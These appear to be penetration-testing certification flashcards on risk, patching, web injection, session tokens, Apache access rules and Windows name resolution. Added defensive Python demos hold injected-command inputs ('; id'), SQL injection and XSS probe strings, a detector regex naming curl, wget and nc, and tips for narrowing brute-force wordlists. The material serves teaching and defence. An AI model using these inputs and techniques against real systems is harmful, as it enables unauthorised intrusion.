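Added example (not part of the original flashcard set, and not the customer application's code): the race from the scenario reduced to a runnable model, with the vulnerable flow beside a hardened one. The two-second sleep is replaced by a hook that runs the attacker's action deterministically inside the window. The vulnerable version re-opens the request file by path after the wait; the hardened version creates the file exclusively with mode 0600, keeps the descriptor open across the wait, reads back through that descriptor and reports when the name was swapped underneath it. File names, field names and the attacker actions are constructed for the demonstration.

```python
"""TOCTOU race on a provisioning file: trusting the path again after a delay vs. reading the
inode you created through a descriptor you never let go of."""
import os
import tempfile
from typing import Callable, Dict, Optional

Hook = Optional[Callable[[str], None]]   # stands in for whatever happens during the 2-second sleep


def parse_request(text: str) -> Dict[str, str]:
    """key=value lines; anything else is rejected (a corrupted file must not crash the parser)."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if "=" not in line:
            raise ValueError(f"malformed line: {line!r}")
        key, value = line.split("=", 1)
        fields[key.strip()] = value.strip()
    if fields.get("privileges") not in ("user", "admin"):
        raise ValueError("privileges must be 'user' or 'admin'")
    return fields


def provision_vulnerable(spool: str, username: str, during_window: Hook = None) -> Dict[str, str]:
    """Write the request, wait, then re-open *by path*: whatever sits at that name now is trusted."""
    path = os.path.join(spool, f"{username}.req")
    with open(path, "w") as fh:
        fh.write(f"user={username}\nprivileges=user\n")
    if during_window:
        during_window(path)
    with open(path) as fh:
        return parse_request(fh.read())


def provision_hardened(spool: str, username: str, during_window: Hook = None) -> Dict[str, str]:
    """Create exclusively (O_EXCL fails if an attacker pre-planted the name) with mode 0600, keep
    the descriptor open across the wait and read back through it. A rename-over by another
    process changes what the *name* points to, not the inode behind the descriptor; the
    fstat/stat comparison reports such a swap so the event can be logged."""
    path = os.path.join(spool, f"{username}.req")
    fd = os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL, 0o600)
    try:
        os.write(fd, f"user={username}\nprivileges=user\n".encode())
        created = os.fstat(fd)
        if during_window:
            during_window(path)
        try:
            now = os.stat(path)
            swapped = (now.st_ino, now.st_dev) != (created.st_ino, created.st_dev)
        except FileNotFoundError:
            swapped = True
        os.lseek(fd, 0, os.SEEK_SET)
        fields = parse_request(os.read(fd, 1 << 16).decode())
        fields["tampered"] = "yes" if swapped else "no"
        return fields
    finally:
        os.close(fd)


def attacker_swaps_file(path: str) -> None:
    """Constructed attacker action: atomically replace the request with an admin request."""
    evil = path + ".evil"
    with open(evil, "w") as fh:
        fh.write("user=mallory\nprivileges=admin\n")
    os.replace(evil, path)


def attacker_corrupts_file(path: str) -> None:
    """Constructed attacker action: replace the request with garbage to knock the parser over."""
    evil = path + ".evil"
    with open(evil, "w") as fh:
        fh.write("not a request at all")
    os.replace(evil, path)


def run_demo() -> Dict[str, object]:
    with tempfile.TemporaryDirectory() as spool:
        results: Dict[str, object] = {
            "vulnerable": provision_vulnerable(spool, "alice", attacker_swaps_file),
            "hardened": provision_hardened(spool, "bob", attacker_swaps_file),
            "dos_hardened": provision_hardened(spool, "dave", attacker_corrupts_file)["privileges"],
        }
        try:
            provision_vulnerable(spool, "carol", attacker_corrupts_file)
            results["dos_vulnerable"] = "survived"
        except ValueError:
            results["dos_vulnerable"] = "parser crashed"
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:14} {outcome}")
```

In a single-user demo the attacker can still rename over the path; on a real system the 0600 mode and a spool directory that is not world-writable stop a different uid from doing even that. The broader fix is to not pass security decisions through the file system at all (hand the record to the provisioning process directly, or sign it), but when a file must be used, never re-resolve the path after the check.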

58
Q
How much risk the organization is willing to tolerate in order to achieve its goals is considered what?
A.Goal reprioritization
B.Risk appetite
C.Risk avoidance
D.Risk rating
A

B.Risk appetite

Explanation
Correct Answer: Risk appetite is correct. Every organization has its own level of risk appetite, which is how much risk (that is, the threshold) the organization is willing to tolerate in order to achieve its goals.

Incorrect Answers: Risk avoidance is incorrect because risk avoidance is the action an organization would follow depending on how much risk it is willing to take on (its risk appetite). An example would be a healthcare provider looking to install a new business automation application to increase productivity for its employees when entering customer medical records, but after further debate the organization decides not to install the application because the security team identifies major security bugs in the software that could be exploited and cause a major security incident.

Goal reprioritization is incorrect because goal reprioritization is used to readjust priorities based on impact.

Risk rating is incorrect because risk rating helps organizations prioritize remediation efforts and aids the organization in quantifying the appropriate risk level for a given risk.

59
Q

During a pentest, you find numerous Windows workstations and servers susceptible to known kernel-level operating system vulnerabilities. Which of the following remediation strategies could you recommend for this scenario? (Choose two.)
A.All of the answer choices are correct
B.Configure a centralized patch management solution
C.Ensure systems are PCI compliant
D.Install missing patches

A

B.Configure a centralized patch management solution
D.Install missing patches

Explanation
Correct Answers: Install missing patches is correct because kernel-level operating system vulnerabilities are mitigated by the vendor (in this case, Microsoft) through a patch.

Configure a centralized patch management solution is correct because a centralized patch management solution (for example, Microsoft WSUS) could help facilitate management and deployment of Microsoft patches/updates for the Windows environment.

Incorrect Answers: Ensure systems are PCI compliant is incorrect because the scenario does not state that the customer is responsible for meeting payment card industry (PCI) requirements.

“All of the answer choices are correct” is incorrect because not all of the answers were correct.

60
Q

Given the following HTML source code, what is known about the web login page? (Choose three.)

Username: <br>Password: <br>

A.The password field length is defined, which can be used to develop rules for brute-force attacks against the login page
B.The username field length is defined, which can be used to develop rules for brute-force attacks against the login page
C.The HTTP method used to submit form data to the web server is a PUT request
D.The default username and password are exposed
A

A.The password field length is defined, which can be used to develop rules for brute-force attacks against the login page
B.The username field length is defined, which can be used to develop rules for brute-force attacks to the login page
D.The default username and password are exposed

Explanation
Correct Answers: The default username and password are exposed is correct because the default credentials are left in an HTML comment in the page source, which any visitor can read. The username field length is defined, which can be used to develop rules for brute-force attacks against the login page and The password field length is defined, which can be used to develop rules for brute-force attacks against the login page are correct because the maxlength attributes cap what the form accepts: you can prune any wordlist entries or rule output longer than the cap and concentrate the brute-force attempts, and a short maximum on the password field is itself a weakness to report.

Incorrect Answer: The HTTP method used to submit form data to the web server is a PUT request is incorrect because the HTTP method used to submit the form data is a POST request, not a PUT, as defined in the HTML source code.
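Added example (not part of the original flashcard set): a small auditor that pulls the three facts the answer relies on out of a login page's markup with Python's html.parser: the form method and action, the maxlength cap on each text and password field, and credential-looking values in HTML comments. The form markup from the question did not survive extraction, so the page fed to it here is constructed for the demonstration and is not that form.

```python
"""Pulls the brute-force-relevant facts out of a login page: form method, field names and
maxlength caps, pre-filled values, and credentials left in HTML comments."""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional

CRED_IN_COMMENT = re.compile(r"(?i)\b(?:user(?:name)?|login|pass(?:word|wd)?|pwd)\b\s*[:=]\s*(\S+)")


class LoginFormAudit(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict[str, object]] = []
        self.comments: List[str] = []
        self._form: Optional[Dict[str, object]] = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"method": a.get("method", "get").upper(),
                          "action": a.get("action", ""), "inputs": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append({
                "name": a.get("name"),
                "type": a.get("type", "text").lower(),
                "maxlength": int(a["maxlength"]) if a.get("maxlength", "").isdigit() else None,
                "value": a.get("value") or None,
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

    def handle_comment(self, data):
        self.comments.append(data.strip())


def audit_login_page(html: str) -> Dict[str, object]:
    parser = LoginFormAudit()
    parser.feed(html)
    findings: List[str] = []
    for form in parser.forms:
        findings.append(f"form submits via {form['method']} to {form['action'] or '(same URL)'}")
        for field in form["inputs"]:
            if field["type"] in ("text", "password", "email"):
                if field["maxlength"]:
                    findings.append(f"{field['name']} capped at {field['maxlength']} chars: "
                                    f"drop longer wordlist entries / rule output")
                if field["value"]:
                    findings.append(f"{field['name']} pre-filled with {field['value']!r}")
    for comment in parser.comments:
        for match in CRED_IN_COMMENT.finditer(comment):
            findings.append(f"credential-looking value in HTML comment: {match.group(0)}")
    return {"forms": parser.forms, "comments": parser.comments, "findings": findings}


# Constructed page for the demonstration; it is NOT the form from the question, whose
# markup did not survive extraction. It only carries the three features the answer names.
SAMPLE_LOGIN_HTML = """
<!-- TODO remove before go-live: default login is username: admin password: Welcome1 -->
<form action="/login" method="post">
  Username: <input type="text" name="username" maxlength="12"><br>
  Password: <input type="password" name="password" maxlength="8"><br>
  <input type="hidden" name="csrf" value="deadbeef">
  <input type="submit" value="Log in">
</form>
"""

if __name__ == "__main__":
    for line in audit_login_page(SAMPLE_LOGIN_HTML)["findings"]:
        print("-", line)
```

Feed it the raw response body (for example from a Burp history export) rather than the browser's rendered DOM, since comments are what the browser hides.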

61
Q
During a pentest, you discover that your testing efforts locked out some of the user accounts on the system. Which communication strategy can you use to help notify proper personnel?
A.Escalation path
B.Call tech support
C.Email your project lead
D.Email executive management
A

A.Escalation path

Explanation
Correct Answer: Escalation path is correct. The escalation path can be used for remediating issues that arise during a pentest.

Incorrect Answers: Email executive management is incorrect because members of executive management are unlikely to understand the technical issues regarding a pentest.

Call tech support is incorrect because tech support may be unaware of the pentest and be really confused as to why you are reporting account lockouts.

Email your project lead is incorrect because emailing your project lead may or may not be part of the approved escalation path.

62
Q
How often are external vulnerability scans required for an entity subject to PCI DSS?
A.Quarterly
B.Annually
C.Semi-monthly
D.Monthly
A

A.Quarterly

Explanation
Correct Answer: Quarterly is correct. PCI DSS requires external vulnerability scans at least quarterly (every three months), performed by a PCI SSC Approved Scanning Vendor (ASV), with rescans until a passing result is obtained; internal vulnerability scans are also required quarterly, and both are repeated after any significant change.

Incorrect Answers: The other choices are incorrect because PCI DSS vulnerability scanning is required quarterly. Note the distinction from penetration testing, which PCI DSS requires at least annually and after any significant infrastructure or application change.

63
Q

During a pentest, you discover a command injection vulnerability in the web application. Which of the following would you recommend to your customer to resolve the issue?
A.Apply the appropriate OS hardening
B.Use a custom error page
C.Use a firewall to filter IP addresses
D. Sanitize and validate user-supplied input

A

D. Sanitize and validate user-supplied input

Explanation
Correct Answer: Sanitize and validate user-supplied input is correct. Command injection occurs when user-controlled data, such as a parameter in an HTTP request, is concatenated into a command string that the application hands to the underlying operating system's shell without validation, so an attacker can append shell metacharacters (;, |, &&, $( )) and run commands of their own. Validation means allow-listing what the parameter may contain (for example only a hostname or an IP address); the stronger fix is to stop invoking a shell at all and pass the validated value as a separate argument to the program being run.

Incorrect Answers: Use a custom error page is incorrect because a custom error page is used to report on an exception, not to prevent it; catching bad input requires additional programming logic to decide what is and is not appropriate for the application to process.

Apply the appropriate OS hardening is incorrect because the vulnerability is within the application, not the operating system.

Use a firewall to filter IP addresses is incorrect because a firewall can help limit the attack surface but not remediate the actual vulnerability.
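Added example (not part of the original flashcard set, and not the customer's application code): the vulnerable pattern beside the remediation the answer describes, using a "ping a host" feature as the stand-in. The vulnerable function builds the shell string the way the flawed code would; the hardened path allow-lists the value as an IP address or RFC 1123 hostname and passes it as its own argv element with no shell involved. The feature, the function names and the tainted input are assumptions for the demonstration.

```python
"""Command injection: the vulnerable shell-concatenation pattern beside an allow-listed,
no-shell replacement, using a 'ping a host' feature as the example."""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname: labels of letters, digits and hyphens, no leading/trailing hyphen.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def vulnerable_ping_command(host: str) -> str:
    """What the vulnerable application builds and would hand to subprocess.run(..., shell=True):
    the request parameter is spliced straight into the command string."""
    return "ping -c 1 " + host


def injected_commands(shell_cmd: str) -> List[str]:
    """Shows what /bin/sh would run: the string split on the shell's command separators."""
    return [part for part in re.split(r"\s*(?:;|&&|\|\||\||\n)\s*", shell_cmd) if part]


def validate_host(host: str) -> str:
    """Allow-list validation: a literal IPv4/IPv6 address or an RFC 1123 hostname, nothing else."""
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME.match(host):
        return host.lower()
    raise ValueError(f"rejected host value: {host!r}")


def is_valid_host(host: str) -> bool:
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def hardened_ping_argv(host: str) -> List[str]:
    """The validated value travels as its own argv element and no shell is involved, so
    metacharacters are inert; a leading '-' cannot survive validation, which also blocks
    argument injection such as host='-f'."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """The only place the program is actually executed; never called with shell=True."""
    return subprocess.run(hardened_ping_argv(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    tainted = "203.0.113.7; id"
    print("vulnerable string:", vulnerable_ping_command(tainted))
    print("shell would run  :", injected_commands(vulnerable_ping_command(tainted)))
    print("hardened argv    :", hardened_ping_argv("203.0.113.7"))
    print("tainted rejected :", not is_valid_host(tainted))
```

When reviewing the customer's fix, grep for `shell=True`, `os.system`, `os.popen` and string-built commands in whatever language the application uses; escaping metacharacters is a weaker remedy than the argv form because every shell and every program has its own quoting rules.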

64
Q

During a web vulnerability assessment, you use the sequencer feature in Burp Suite to evaluate the web application’s ability to generate secure session tokens. Why should session tokens that are used for authentication be randomized? (Choose two.)
A.To prevent session-hijacking attacks
B.To protect against predictable session tokens
C.To prevent forced browsing attacks
D.To defend against clickjacking attacks

A

A.To prevent session-hijacking attacks
B.To protect against predictable session tokens

Explanation
Correct Answers: To protect against predictable session tokens is correct because the lack of randomness with session tokens will make an attacker’s life easy when attempting to recover an existing, valid session with the web application. To prevent session-hijacking attacks is correct because if the session token can be predicted, it can be replayed (hijacked) and the identity of the user would be compromised.

Incorrect Answers: To prevent forced browsing attacks is incorrect because forced browsing is a result of the web application/server’s authentication scheme being inconsistent, and would allow for an unauthenticated user to access a portion of a restricted web site/application due to lack of access control.

To defend against clickjacking attacks is incorrect because session tokens play no part in clickjacking, which tricks a user into clicking on a page rendered inside an attacker-controlled frame; the defence is to forbid framing with the X-Frame-Options or Content-Security-Policy frame-ancestors response headers, not to change how sessions are generated.
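Added example (not part of the original flashcard set, and not Burp's Sequencer): the kind of randomness check Sequencer automates, reduced to two measurements you can run over an exported token sample. Per-position Shannon entropy exposes fixed or low-variation characters, and a sequential-value check catches counters. Three token generators are constructed for comparison; the third one (a hash of a counter) is there to show the limit of statistical testing, because it passes the checks while remaining fully predictable to anyone who knows the scheme.

```python
"""Token-randomness checks in the spirit of Burp Sequencer: per-position entropy plus a
counter/sequence check, run against three constructed generators."""
import hashlib
import math
import secrets
from collections import Counter
from typing import Dict, Iterable, List


def shannon_bits(symbols: Iterable[str]) -> float:
    counts = Counter(symbols)
    n = sum(counts.values())
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyse_tokens(tokens: List[str]) -> Dict[str, object]:
    """Per-position Shannon entropy over the sample plus a sequential-value check for hex tokens."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("tokens differ in length; analyse one format at a time")
    alphabet_bits = math.log2(len(set("".join(tokens))))
    per_position = [shannon_bits(t[i] for t in tokens) for i in range(length)]
    mean_bits = sum(per_position) / length
    counter_like = False
    if all(all(ch in "0123456789abcdefABCDEF" for ch in t) for t in tokens):
        values = [int(t, 16) for t in tokens]
        deltas = [abs(b - a) for a, b in zip(values, values[1:])]
        counter_like = bool(deltas) and max(deltas) < 2 ** 24   # consecutive tokens numerically close
    return {
        "length": length,
        "alphabet_bits": alphabet_bits,
        "min_position_bits": min(per_position),        # 0.0 exposes fixed prefixes or suffixes
        "mean_position_bits": mean_bits,
        "estimated_bits": mean_bits * length,
        "counter_like": counter_like,
        "predictable": counter_like or min(per_position) < 1.0
                       or mean_bits < 0.75 * alphabet_bits,
    }


def counter_tokens(n: int, start: int = 0x5F3E2A10_0000_0000) -> List[str]:
    """Constructed weak scheme: a fixed prefix followed by an incrementing counter."""
    return [f"{start + i:032x}" for i in range(n)]


def hashed_counter_tokens(n: int) -> List[str]:
    """Constructed weak scheme the statistics cannot catch: SHA-256 of a predictable counter."""
    return [hashlib.sha256(str(i).encode()).hexdigest()[:32] for i in range(n)]


def random_tokens(n: int) -> List[str]:
    """What the application should do: 128 bits from the OS CSPRNG per session."""
    return [secrets.token_hex(16) for _ in range(n)]


if __name__ == "__main__":
    for label, sample in (("counter", counter_tokens(256)),
                          ("sha256(counter)", hashed_counter_tokens(256)),
                          ("secrets.token_hex", random_tokens(256))):
        stats = analyse_tokens(sample)
        print(f"{label:18} est. bits={stats['estimated_bits']:6.1f} "
              f"min/pos={stats['min_position_bits']:.2f} predictable={stats['predictable']}")
```

The hashed-counter result is the caveat to carry into the report: Sequencer-style statistics measure how the output looks, not how it was produced, so a passing score is necessary but not sufficient, and a review of the generator (a CSPRNG such as the one behind secrets, with at least 128 bits of output) is still required.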

65
Q

During a pentest, your team is having issues running a root setuid program on an NFS file system in a directory named /share. The permissions on the executable are 4777. What is the likely cause of the problem?
A.The setuid flag is missing on the program
B.The NFS share is mounted with the nosuid option
C.Your team is not executing the program using the full path
D.The program is missing the executable flag

A

B.The NFS share is mounted with the nosuid option

Explanation
Correct Answer: The NFS share is mounted with the nosuid option is correct. A file system mounted with nosuid ignores the setuid and setgid bits on any executable it contains, so the program runs with the caller's privileges rather than the owner's. Mounting remote or removable file systems with nosuid (often together with noexec and nodev) is a standard hardening measure that prevents a setuid binary planted on a share from being used for local privilege escalation; you can confirm it from the client with findmnt -o TARGET,OPTIONS /share or by inspecting /proc/mounts.

Incorrect Answers: The program is missing the executable flag is incorrect because the mode 4777 grants read, write and execute permission to the owner, the group and everyone else (the 777 part), so the file is executable.

The setuid flag is missing on the program is incorrect because the setuid bit is set with the 4 in the 4777 permission setting.

Your team is not executing the program using the full path is incorrect because the full path of the executable is not needed when you are executing the program in the directory in which it resides.

66
Q

During a compliance scan of a customer's Apache HTTP server, you discover the following in the httpd.conf file. What is a potential concern given the output of the compliance scan?

Order Deny, Allow Deny from all Allow from all

A.The HTTP server is configured to allow anyone to access, what looks to be a sensitive part of the web server, which warrants further discussion with the customer
B.The HTTP server is configured correctly, and there is no call for concern
C.The HTTP server contains a sensitive directory that needs to be protected
D.The HTTP server is configured to deny all, which would restrict access for valid users
A

A.The HTTP server is configured to allow anyone to access, what looks to be a sensitive part of the web server, which warrants further discussion with the customer

Explanation
Correct Answer: The HTTP server is configured to allow anyone to access what looks to be a sensitive part of the web server, which warrants further discussion with the customer is correct. With Order Deny,Allow, the Deny directives are evaluated first and the Allow directives second, and a matching Allow overrides a matching Deny; Allow from all therefore cancels Deny from all, and the net effect is that the directory is open to every client (which is also the default state for that Order). The Order, Allow and Deny directives are the Apache 2.2 access-control syntax, still available in 2.4 through mod_access_compat; the 2.4 equivalent of this stanza is Require all granted, and a restriction would be written as Require ip <network>. The sensitive directory is thus exposed to anyone who can reach the server, which is a concern because unauthorized individuals may have access to sensitive data in that location.

Incorrect Answers: The HTTP server is configured to deny all, which would restrict access for valid users is incorrect because the “allow all” clause in the configuration would permit access to the valid users who are supposed to be using the website.

The HTTP server contains a sensitive directory that needs to be protected is incorrect because the directory is named “sensitive,” but it may not have any sensitive data at all. Further investigation is warranted before drawing any final conclusions.

The HTTP server is configured correctly, and there is no call for concern is incorrect because the result of the compliance scan does show a potential for concern, given the name of the directory. Without discussing the results with the customer and validating the contents of the web directory, you cannot say for certain that there is no call for concern.
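Added example (not part of the original flashcard set, and not Apache code): an evaluator for Apache 2.2-style Order / Deny from / Allow from stanzas, so you can test what a scan finding actually permits for a given client address before writing it up. It implements the documented precedence rules (Deny,Allow: Allow overrides Deny and the default is allow; Allow,Deny: Deny overrides Allow and the default is deny) and the common address forms. The stanza from the question is reproduced on separate lines; the surrounding Directory container, its path and the corrected network list are assumptions for the demonstration, and hostname and env= forms are not modelled.

```python
"""Evaluates Apache 2.2-style (mod_access_compat) Order / Deny from / Allow from stanzas
for a client IP address."""
import ipaddress
from typing import List, Tuple


def _matches(client, spec: str) -> bool:
    """'all', a full address, a CIDR or netmask network, or a dotted partial prefix such as '192.168.1'."""
    spec = spec.strip()
    if spec.lower() == "all":
        return True
    try:
        return client in ipaddress.ip_network(spec, strict=False)
    except ValueError:
        pass
    if client.version == 4 and spec.replace(".", "").isdigit():
        return str(client).startswith(spec.rstrip(".") + ".")
    return False                      # hostname and env= forms are not modelled here


def parse_stanza(config: str) -> Tuple[Tuple[str, str], List[str], List[str]]:
    """Returns (order, allow_specs, deny_specs). Apache's default Order is Deny,Allow."""
    order, allow, deny = ("deny", "allow"), [], []
    for raw in config.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        words = line.split()
        key = words[0].lower()
        if key == "order":
            parts = tuple(p.strip().lower() for p in "".join(words[1:]).split(","))
            if parts not in (("deny", "allow"), ("allow", "deny")):
                raise ValueError(f"unsupported Order directive: {line}")
            order = parts
        elif key in ("allow", "deny") and len(words) > 2 and words[1].lower() == "from":
            (allow if key == "allow" else deny).extend(words[2:])
    return order, allow, deny


def is_allowed(config: str, client_ip: str) -> bool:
    order, allow, deny = parse_stanza(config)
    client = ipaddress.ip_address(client_ip)
    in_allow = any(_matches(client, s) for s in allow)
    in_deny = any(_matches(client, s) for s in deny)
    if order == ("deny", "allow"):
        # Deny evaluated first, Allow second; default state is allow, so a matching
        # Allow overrides a matching Deny.
        return True if in_allow else not in_deny
    # Allow,Deny: Allow first, Deny second; default state is deny, so Deny wins ties.
    return in_allow and not in_deny


# The stanza from the scan finding, one directive per line; the Directory container and
# its path are assumed for the demonstration.
SCAN_FINDING = """
<Directory "/srv/www/sensitive">
    Order Deny,Allow
    Deny from all
    Allow from all
</Directory>
"""

# A corrected stanza (example networks). Apache 2.4 equivalent: Require ip 10.0.0.0/8 192.168.1
CORRECTED = """
<Directory "/srv/www/sensitive">
    Order Deny,Allow
    Deny from all
    Allow from 10.0.0.0/8 192.168.1
</Directory>
"""

if __name__ == "__main__":
    for ip in ("203.0.113.9", "10.20.30.40", "192.168.1.77"):
        print(f"{ip:14} finding={is_allowed(SCAN_FINDING, ip)!s:5} corrected={is_allowed(CORRECTED, ip)}")
```

Run the evaluator over the finding with an address from outside the customer's ranges: a True result is the evidence for the report, and the same call against the proposed fix is a cheap regression test before it goes into change control.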

67
Q
Critical findings in a pentest report are likely to have \_\_\_\_\_\_\_\_\_\_\_\_\_\_ on a customer network.
A.a medium impact
B.a low impact
C.no impact
D.a high impact
A

D.a high impact

Explanation
Correct Answer: A high impact is correct. Critical findings will have a high impact on the network, based on environmental factors such as the sophistication of the exploit and how it affects the confidentiality, integrity, and availability of the system/network.

Incorrect Answers: Low impact is incorrect because low-impact findings are rated with a low severity level.

Medium impact is incorrect because medium-impact findings are rated with a medium severity level.

No impact is incorrect because there are no findings that should be categorized with a no impact level of severity.

68
Q
An unauthorized individual, who has made up a false story, has followed an authorized employee through a restricted entry way, and the authorized employee consented to letting the unauthorized individual in. What type of social engineering attack does this describe?
A.Authentication bypass
B.Piggybacking
C.Tailgating
D.Phishing
A

B.Piggybacking

Explanation
Correct Answer: Piggybacking is correct. Piggybacking is the technique used by an intruder to gain unauthorized access to a secure location by walking in through the door behind an authorized employee with legitimate access who consents to the access.

Incorrect Answers: Authentication bypass is incorrect because an authentication bypass is when the security mechanism (software or hardware) enforcing the access control can be defeated without using the proper credential (i.e., password, key, badge ID, etc.).

Tailgating is incorrect because tailgating is when an unauthorized individual gains access to a restricted area by following directly behind an authorized employee with legitimate access, as in piggybacking, but tailgating occurs without the knowledge or consent of the authorized employee.

Phishing is incorrect because phishing is a social engineering technique that targets users via email (or SMS and phone in its smishing and vishing variants) rather than through physical entry.

69
Q
A type of file used to support a dictionary-based attack is often referred to as a \_\_\_\_\_\_\_.
A.Hash table
B.Source code
C.Word list
D.Rainbow table
A

C.Word list

Explanation
Correct Answer: Word list is correct. A word list is used to compile a list of potential passwords that could be used during a dictionary attack.

Incorrect Answers: Rainbow table is incorrect because a rainbow table is a precomputed structure of hash chains used to reverse a hash back to its plaintext; it is used to look up hashes, not as a list of candidate passwords to try.

Source code is incorrect because source code is not a list of commonly used words and phrases; it contains the code used to build or run a computer program.

Hash table is incorrect because a hash table is a lookup structure (here, precomputed hash-to-plaintext pairs) used to match hashes, not a list of words or phrases that could be used as passwords.

70
Q
During a pentest your customer asks you to review a log entry from a target web server, as the malicious traffic appears to originate from one of your team's authorized IPv4 addresses. The log file shows the following:```GET /info.php?id=1%20AND%201=1 HTTP/1.1 200```What is your team member likely testing for?
A.XSS
B.SQL Injection
C.CSRF
D.Command injection
A

B.SQL Injection

Explanation
Correct Answer: SQL injection is correct. The decoded parameter reads id=1 AND 1=1: the AND operator is appended to the expected value to form a condition that is always true, and the tester compares the response with that of a second request such as id=1 AND 1=2 (always false). If the two responses differ in content or size, the parameter is being evaluated inside a SQL query and is vulnerable to boolean-based injection. URL encoding (%20) represents the spaces in the request. The 200 status only tells you the request completed; on its own it does not indicate whether the test succeeded.

Incorrect Answers: Command injection is incorrect because the request contains no shell metacharacters or commands such as cat, ls or id; the parameter value is used to reference a record in the database.

XSS is incorrect because the log entry carries no HTML or script content (such as <script> tags or event-handler attributes) in the parameter, which is the characteristic of a cross-site scripting (XSS) probe.

CSRF is incorrect because there was no attempt to exploit a cross-site request forgery (CSRF) in the web request.
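Added example (not part of the original flashcard set): the triage a customer would do on the web server log, as code. It parses both the bare request line quoted in the question and Combined Log Format entries, URL-decodes the path and every parameter value, and labels each request as a SQL injection, XSS or command injection probe (or none) from the characteristics the explanation describes. The sample log is constructed for the demonstration; the patterns are deliberately small and will miss evasions, which is the point to make when a customer asks whether log grepping replaces a WAF or a code fix.

```python
"""Classifies web-server log requests as SQLi, XSS or command-injection probes after URL-decoding."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Accepts both a bare request line with a status (as in the question) and Combined Log Format.
LOG_RE = re.compile(
    r'^(?:(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]*)\] )?'
    r'"?(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"? (?P<status>\d{3})(?: (?P<size>\d+|-))?'
)

PATTERNS = {
    "SQL injection": re.compile(
        r"(?i)\b(?:and|or)\b\s+[\w']+\s*=\s*[\w']+"      # 1 AND 1=1, ' OR 'a'='a
        r"|\bunion\b\s+(?:all\s+)?\bselect\b"
        r"|\b(?:sleep|benchmark|pg_sleep|waitfor)\b\s*\(?"
        r"|--\s*$|\bdrop\s+table\b"),
    "XSS": re.compile(r"(?i)<\s*/?script|javascript:|\bon(?:error|load|mouseover|click)\s*="),
    "command injection": re.compile(
        r"(?:;|\||&&|`|\$\()\s*(?:cat|ls|id|whoami|uname|wget|curl|nc|ping|bash|sh)\b"),
}


def classify_request(target: str) -> Optional[str]:
    """Decode the path, the whole query and each parameter value, then test them in turn."""
    parts = urlsplit(target)
    samples = [unquote_plus(parts.path), unquote_plus(parts.query)]
    samples += [value for _, value in parse_qsl(parts.query, keep_blank_values=True)]
    for technique, pattern in PATTERNS.items():
        if any(pattern.search(s) for s in samples):
            return technique
    return None


def parse_log_line(line: str) -> Optional[Dict[str, object]]:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry: Dict[str, object] = m.groupdict()
    entry["technique"] = classify_request(m.group("target"))
    return entry


def scan_log(text: str) -> List[Dict[str, object]]:
    return [e for e in (parse_log_line(l) for l in text.splitlines()) if e]


PAGE_ENTRY = "GET /info.php?id=1%20AND%201=1 HTTP/1.1 200"   # the line quoted in the question

# Constructed Combined Log Format sample (addresses from the RFC 5737 documentation ranges).
SAMPLE_LOG = """
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /info.php?id=1%20AND%201=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /info.php?id=1%20AND%201=2 HTTP/1.1" 200 311
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 904
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /tools/ping.php?host=127.0.0.1%3Bid HTTP/1.1" 200 118
198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /info.php?id=7 HTTP/1.1" 200 640
"""

if __name__ == "__main__":
    for e in scan_log(SAMPLE_LOG):
        print(f"{e['ip']:14} {e['status']} {str(e['size']):>4} {str(e['technique']):18} {e['target']}")
```

Read the first two sample lines as a pair: the same client sends the always-true and always-false variants seconds apart and gets different response sizes (512 versus 311), which is the boolean-based blind signal the tester was looking for. Both returned 200, so status codes alone would have hidden it.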

71
Q
By default, what type of queries will a Windows host send over the network if it cannot resolve the host name through DNS? (Choose two.)
A.ARP
B.ICMP
C.LLMNR
D.NBNS
A

C.LLMNR
D.NBNS

Explanation
Correct Answers: LLMNR and NBNS are correct. When a Windows host cannot resolve a name through DNS (a mistyped share name, a stale WPAD entry, a decommissioned host), it falls back by default to Link-Local Multicast Name Resolution (LLMNR, UDP 5355 to multicast 224.0.0.252) and then NetBIOS Name Service (NBNS, UDP 137 to the subnet broadcast) queries on the local segment; newer Windows 10 and 11 builds also send mDNS queries. Any host on the segment can answer these, which is what tools such as Responder exploit to capture NetNTLM authentication. Both fallbacks can be disabled: LLMNR through the Group Policy setting Turn off multicast name resolution, and NetBIOS over TCP/IP in the adapter's WINS settings or through a DHCP vendor option.

Incorrect Answers: ARP is incorrect because the Address Resolution Protocol (ARP) is used for resolving an IP address to a MAC address.

ICMP is incorrect because the Internet Control Message Protocol (ICMP) is used for communicating with hosts over the network and sending error messages and other operational information regarding services over the network.
